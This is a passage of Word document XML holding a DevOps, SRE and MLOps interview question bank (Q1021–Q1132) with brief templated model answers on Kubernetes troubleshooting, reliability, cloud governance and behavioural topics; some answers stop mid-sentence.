        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention describe pod, logs, previous logs, events, probes, image pull, config, secrets, resource limits, and CrashLoopBackOff causes.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Q1021. Describe a memory leak investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss memory graphs, heap/profile analysis, container limits, OOM events, code path isolation, and remediation.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Q1022. Explain a CPU spike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Q1023. Describe node pressure handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss disk, memory, PID, and CPU pressure, evictions, taints, capacity, cleanup, and node autoscaling.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Q1024. Explain cluster autoscaler issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention pending pods, requests, quotas, node pool limits, taints/tolerations, zones, and cloud provider capacity.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Q1025. Describe API latency troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover RED metrics, traces, dependency latency, database queries, saturation, p95/p99, caching, and load balancer behavior.</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Q1026. Explain a database bottleneck issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention slow queries, locks, indexes, connection pools, IOPS, replicas, caching, and scaling strategy.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Q1027. Describe an observability improvement project.</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Q1028. Explain a service mesh issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss sidecar health, mTLS certificates, policies, retries, timeouts, traffic routing, and telemetry.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Q1029. Describe a deployment rollback scenario.</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Q1030. Explain blue-green deployment implementation.</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Q1031. Describe canary deployment monitoring.</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Q1032. Explain infrastructure drift remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention drift detection, plan review, source-of-truth updates, reconciliation, and preventing manual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Q1033. Describe an IaC governance project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss module standards, policy checks, approvals, state controls, tagging, and audit evidence.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Q1034. Explain secret management implementation.</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Q1035. Describe cloud migration planning.</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Q1036. Explain a compliance audit experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention controls, evidence collection, audit logs, access reviews, encryption, vulnerability management, and remediation tracking.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Q1037. Describe Kubernetes RBAC troubleshooting.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Q1038. Explain image vulnerability remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention scanning, severity triage, fixed image rebuilds, dependency upgrades, exceptions, and deployment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Q1039. Describe reducing deployment time.</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Q1040. Explain optimizing CI/CD pipelines.</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Q1041. Describe a failed release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For a failed release,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Q1042. Explain disaster recovery testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover RTO/RPO, backups, replication, failover runbooks, restore tests, and post-test improvements.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Q1043. Describe backup restoration testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention restore validation, encryption, retention, isolation, monitoring, and recovery-time measurement.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Q1044. Explain a load balancer issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss health checks, backend status, firewall rules, certificates, routing, logs, and traffic distribution.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Q1045. Describe SSL certificate outage handling.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Q1046. Explain how you secure Kubernetes.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Q1047. Describe a platform engineering initiative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For a platform engineering initiative,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Q1048. Explain how you define SLOs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain user journeys, SLIs, targets, windows, error budgets, alerting, and review cadence.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Q1049. Describe error budget enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss burn rate, release decisions, reliability investment, stakeholder alignment, and policy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Q1050. Explain reducing infrastructure costs.</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Q1051. Describe a monitoring dashboard you built.</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Q1052. Explain a production debugging strategy.</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Q1053. Describe improving deployment reliability.</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Q1054. Explain handling conflicting priorities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain impact-based prioritization, risk, deadlines, stakeholder alignment, and explicit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Q1055. Describe a difficult team conflict.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For a difficult team conflict,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Q1056. Explain how you handle criticism.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention listening, clarifying, separating intent from impact, acting on useful feedback, and following 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Q1057. Describe a project you owned end-to-end.</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Q1058. Explain a leadership experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention aligning people, making decisions under uncertainty, communicating clearly, and improving team outcomes.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Q1059. Describe your communication style.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss adapting detail to audience, writing clear updates, surfacing risks early, and closing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Q1060. Explain a project delay and recovery.</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Q1061. Describe your biggest technical achievement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For biggest technical achievement,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Q1062. Explain your biggest failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For biggest failure,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Q1063. Describe a time you learned quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For a time you learned quickly,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Q1064. Explain how you handle ambiguity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain clarifying goals, making assumptions explicit, creating options, validating quickly, and iterating.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Q1065. Describe working with cross-functional teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention shared goals, clear interfaces, regular syncs, tradeoff discussions, and documented decisions.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Q1066. Explain how you document systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss architecture diagrams, runbooks, ADRs, READMEs, ownership, examples, and keeping docs close to code.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Q1067. Describe knowledge-sharing initiatives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention demos, brown bags, docs, pairing, postmortems, and reusable templates.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Q1068. Explain improving operational excellence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover SLOs, automation, incident reviews, runbooks, capacity planning, and continuous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Q1069. Describe reducing toil.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention repetitive manual work, automation priority, safety checks, and hours saved.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Q1070. Explain self-healing infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss health checks, autoscaling, restart policies, circuit breakers, automated remediation, and guardrails.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Q1071. Describe chaos engineering implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention hypothesis, controlled blast radius, monitoring, rollback,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Q1072. Explain handling a cascading failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss dependency isolation, circuit breakers, rate limits, bulkheads, backpressure, and incident mitigation.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Q1073. Describe a cloud outage response.</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Q1074. Explain Kubernetes API server failure handling.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Q1075. Describe etcd corruption recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention snapshots, quorum, corruption detection, restore procedure, API server validation, and backup testing.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Q1076. Explain multi-region failover.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss health checks, DNS or load-balancer routing, replicated data, consistency, RTO/RPO, and failback.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Q1077. Describe implementing DR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Q1078. Explain scaling ML inference systems.</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Q1079. Describe GPU resource optimization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss requests/limits, node pools, bin packing, quotas, utilization metrics, sharing, and job scheduling.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Q1080. Explain model deployment rollback.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Q1081. Describe ML monitoring implementation.</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Q1082. Explain data drift remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention drift metrics, baseline comparison, feature analysis, alerts, retraining, and business validation.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Q1083. Describe a feature store implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss offline/online stores, feature definitions, point-in-time correctness, low-latency serving, and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Q1084. Explain an enterprise DevOps transformation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention culture, CI/CD, IaC, observability, platform enablement, metrics, and incremental adoption.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Q1085. Describe implementing GitOps at scale.</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Q1086. Explain improving developer productivity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss golden paths, templates, faster pipelines, self-service environments, documentation, and feedback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Q1087. Describe platform reliability improvements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention SLOs, capacity, incident response, automated remediation, observability, and shared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Q1088. Explain reducing cloud spend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For reducing cloud spend,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Q1089. Describe a Kubernetes security audit.</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Q1090. Explain your incident command process.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Q1091. Describe managing technical debt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention inventory, risk ranking, incremental cleanup, ownership, tests, and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Q1092. Explain how you prepare for on-call.</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Q1093. Describe improving system resilience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For improving system resilience,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Q1094. Explain implementing HA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Q1095. Describe handling a noisy neighbor issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For handling a noisy neighbor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Q1096. Explain storage outage troubleshooting.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Q1097. Describe cluster networking debugging.</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Q1098. Explain debugging service discovery issues.</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Q1099. Describe production traffic migration.</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Q1100. Explain zero downtime upgrade strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For zero downtime upgrade strategy,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Q1101. Describe implementing policy as code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For implementing policy as code,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Q1102. Explain managing secrets securely.</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Q1103. Describe handling insider security risks.</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Q1104. Explain improving audit readiness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention evidence automation, policy as code, access reviews, logging, vulnerability tracking, and change records.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Q1105. Describe cloud governance implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss policies, ownership, cost controls, IAM, tagging, compliance, and automated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Q1106. Explain stakeholder management.</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Q1107. Describe balancing speed vs stability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For balancing speed vs stability,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Q1108. Explain handling unrealistic deadlines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention clarifying scope, risk communication, phased delivery, tradeoffs, and protecting critical quality bars.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Q1109. Describe mentoring an underperforming engineer.</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Q1110. Explain your learning strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention hands-on projects, official docs, incident reviews, reading RFCs/design docs, and teaching others.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Q1111. Describe your approach to system design interviews.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain requirements, estimates, APIs, data model, architecture, bottlenecks, reliability, security, and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Q1112. Explain how you stay updated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention official docs, release notes, engineering blogs, hands-on labs, community talks, and applying learning in projects.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Q1113. Describe your favorite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Q1114. Explain a complex debugging session.</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Q1115. Describe handling customer-impacting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Q1116. Explain reducing deployment risk.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Q1117. Describe implementing observability at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss telemetry pipelines, sampling, cardinality control, retention, SLO dashboards, ownership, and cost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Q1118. Explain SRE best practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SRE best practices include defining SLIs and SLOs, managing error budgets, automating toil, improving observability, running blameless postmortems, testing reliability, and making releases safer through progressive delivery. A strong answer should connect reliability work to measurable user impact rather than only infrastructure uptime.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Q1119. Describe scaling Kubernetes clusters.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Q1120. Explain enterprise platform modernization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enterprise platform modernization means improving legacy delivery, infrastructure, and operations using cloud-native architecture, CI/CD, IaC, observability, security automation, and self-service developer workflows. A strong answer should describe the starting pain points, migration phases, risk controls, stakeholder alignment, measurable reliability or delivery improvements, and how teams adopted the new platform.</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Q1121. Describe migrating from monolith to microservices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should explain how you identified service boundaries, reduced coupling, extracted capabilities incrementally, handled data ownership, built CI/CD, added observability, and managed rollback risk. Mention phased migration patterns such as strangler fig, API gateways, backward-compatible contracts, and business-driven prioritization.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Q1122. Explain designing an ML platform for millions of users.</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Q1123. Describe scaling Kafka infrastructure.</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Q1124. Explain implementing platform security.</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Q1125. Describe optimizing Kubernetes costs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should describe measuring cluster spend, identifying idle or oversized workloads, tuning requests and limits, right-sizing node pools, using autoscaling, spot/preemptible nodes where safe, namespace quotas, and storage cleanup. Include how you protected reliability with SLOs, load tests, dashboards, and gradual rollout of cost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Q1126. Explain enterprise incident management.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Q1127. Describe improving team culture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention psychological safety, ownership, learning from incidents, documentation, mentoring, and healthy delivery practices.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Q1128. Explain how you prepare for Google interviews.</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Q1129. Describe your ideal platform architecture.</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Q1130. Explain your long-term technical vision.</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Q1131. Design and explain a complete enterprise-grade DevOps + MLOps platform for Google-scale systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A complete enterprise-grade DevOps + MLOps platform should combine cloud foundation, secure infrastructure, CI/CD, GitOps, Kubernetes, observability, SRE practices, and MLOps lifecycle automation. The goal is to let teams ship software and ML models quickly while keeping reliability, security, compliance, and cost under control.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Start with the foundation: organization structure, landing zone, private networking, IAM, service accounts, secrets management, audit logging, policy-as-code, and Terraform modules. Then explain delivery: source control, CI pipelines, artifact registry, SBOM, vulnerability scanning, image signing, deployment gates, GitOps reconciliation, canary rollout, blue-green deployment, and rollback automation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>MLOps layer:</w:t>
        <w:br/>
        <w:t>Add data ingestion, validation, feature engineering, feature store, experiment tracking, training orchestration, model registry, approval workflow, model serving, A/B testing, model monitoring, drift detection, bias checks, and automated retraining. For production inference, include autoscaling, batching, GPU/TPU planning, latency SLOs, model rollback, and prediction logging.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Google-scale concerns:</w:t>
        <w:br/>
        <w:t>Discuss multi-region architecture, global load balancing, tenant isolation, quota management, platform self-service, standardized golden paths, error budgets, incident response, disaster recovery testing, cost governance, and compliance evidence. A strong answer should show tradeoffs: managed services vs control, active-active vs active-passive, consistency vs availability, and speed vs safety.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Advanced Kubernetes, GCP, Terraform, Python and Scenario-Based Questions (1001-1080)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1132. How do you troubleshoot a Kubernetes pod stuck in CrashLoopBackOff?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
